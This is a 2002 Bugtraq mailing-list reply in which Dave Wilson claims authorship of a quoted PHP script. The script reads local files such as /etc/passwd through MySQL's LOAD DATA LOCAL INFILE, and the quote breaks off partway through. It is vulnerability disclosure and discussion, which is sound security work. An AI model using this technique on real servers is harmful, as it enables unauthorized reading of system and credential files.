[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    Re: File reading vulnerable in PHP and MySQL (Local Exploit)
From:       Dave Wilson <dw () botanicus ! net>
Date:       2002-11-27 9:54:58
[Download RAW message or body]

Hi there,

Please see http://botanicus.net/dw/sec.html - I wrote about this in
February. Prior to that, other people have claimed to have come across
this too.

On Tue, Nov 26, 2002 at 10:57:52AM -0000, Hai Nam Luke wrote:

> Attacker can use PHP and mySQL to read some local file following this way:
> 
> # Create a database (mySQL) and upload this file to your server
> PHP Code: viewfile.php (programmed by Luke)
> 
> ======================================================
> <?
> // config this data
> $dbhost = "";
> $dbuser = "";
> $dbpasswd = "";
> $dbname = "";
> $file = "/etc/passwd"; // filename that you wanna view 
> 
> // shell code
>         echo "<pre>";
> 
>                                 mysql_connect ($dbhost, $dbuser, 
> $dbpasswd);
>                                 $sql = array (
>                                    "USE $dbname",
> 
>                                    'CREATE TEMPORARY TABLE ' . ($tbl 
> = 'A'.time
> ()) . ' (a LONGBLOB)',
> 
>                                    "LOAD DATA LOCAL INFILE '$file' INTO 
> TABLE
> $tbl FIELDS "
>                                    . "TERMINATED BY      
> '__THIS_NEVER_HAPPENS__' "
>                                    . "ESCAPED BY          '' "
>                                    . "LINES TERMINATED BY
> '__THIS_NEVER_HAPPENS__'",
> 
>                                    "SELECT a FROM $tbl LIMIT 1"
>                                 );


Umm, this is my code. Please check any good Bugtraq archive for proof of
this fact. This is pretty much identical, except my English is better
:-).

> Luke (HVA)
> http://www.hackervn.net

Dave Wilson.
[prev in list] [next in list] [prev in thread] [next in thread]